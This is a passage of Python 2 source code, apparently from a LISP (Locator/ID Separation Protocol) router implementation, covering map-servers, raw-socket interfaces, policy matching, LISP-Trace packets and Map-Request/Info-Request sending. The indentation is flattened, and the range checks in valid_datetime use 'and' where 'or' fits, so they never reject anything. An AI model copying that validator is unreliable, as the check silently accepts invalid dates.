ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, create a lisp_ms() for
# each additional A-record. Only the master entry (A-record index 0)
# does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s.bind((device, 0))  # bind() returns None, so keep the socket object in s
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
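#
# Expect the string in "YYYY-MM-DD-HH:MM:SS" form, the same layout that
# now() below produces.
#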
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#enddef
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
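#
# Each match clause AND's its configured sub-fields; clauses are OR'ed,
# so the first clause whose configured fields all match returns True.
#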
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
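#
# The fixed header is 16 bytes: the type/port word, the local private
# IPv4 RLOC, and a 64-bit nonce. JSON-encoded trace data (typically a
# list of records) follows the header; see encode() and decode() below.
#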
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check for an IGMP packet first; skip the IP checksum and TTL checks for it.
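# (IP protocol number 2 at offset 9 of the IPv4 header identifies IGMP.)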
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Did we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
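#
# Illustrative arithmetic (constant value hypothetical): if
# LISP_MAP_REQUEST_RATE_LIMIT is 5 seconds and the last data-triggered
# Map-Request was sent at t=10.0, calls to this function before t=15.0
# return True (rate-limit the Map-Request) and later calls return False,
# unless the temporary no-rate-limit window is still active.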
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
    # Set RLOC-probe parameters if the caller wants the Map-Request to be an
    # RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
    # Hold the request nonce so we can match replies from xTRs that have
    # multiple RLOCs. The reply's source address may not be the probed
    # destination. And in our ETR implementation, the probe request
    # destination can arrive in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into an "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only, so the lisp-itr and lisp-etr processes don't
# both add and delete host routes (for Info-Request sending purposes) at
# the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
        # If we found a host route for the map-server, then both the lisp-itr
        # and lisp-etr processes are in this routine at the same time.
        # Wait for the host route to go away before proceeding. We use
        # the map-server host route as an IPC lock. For the data port, only
        # the lisp-etr process will add a host route to the RTR for Info-
        # Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
    # Send packet to the control port via the control-sockets interface. For
    # port 4341, do the same via the lisp-core process but prepend a LISP data
    # header to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
        # The NAT-traversal spec says to use port 4342 as the source port,
        # but that would mean return data packets will go to the lisp-core
        # process. We are going to use an ephemeral port here so packets
        # come to this lisp-etr process. The commented out call would
        # allow Info-Requests to use source port 4342 but would break the
        # data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
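#
# The following is an illustrative sketch, not the lispers.net implementation,
# of turning the 'ip route | egrep "default via"' output shown above into the
# (device, next-hop) pairs this function iterates over. The function name and
# sample text are hypothetical.
#
def lisp_example_parse_default_routes(route_output):
    next_hops = []
    for line in route_output.splitlines():
        fields = line.split()
        if (len(fields) < 5 or fields[0] != "default"): continue
        if (fields[1] != "via" or fields[3] != "dev"): continue
        next_hops.append([fields[4], fields[2]])
    #endfor
    return(next_hops)
#enddef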
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
    # Cache info sources so we can process Map-Requests from them specially
    # and proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid set to True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
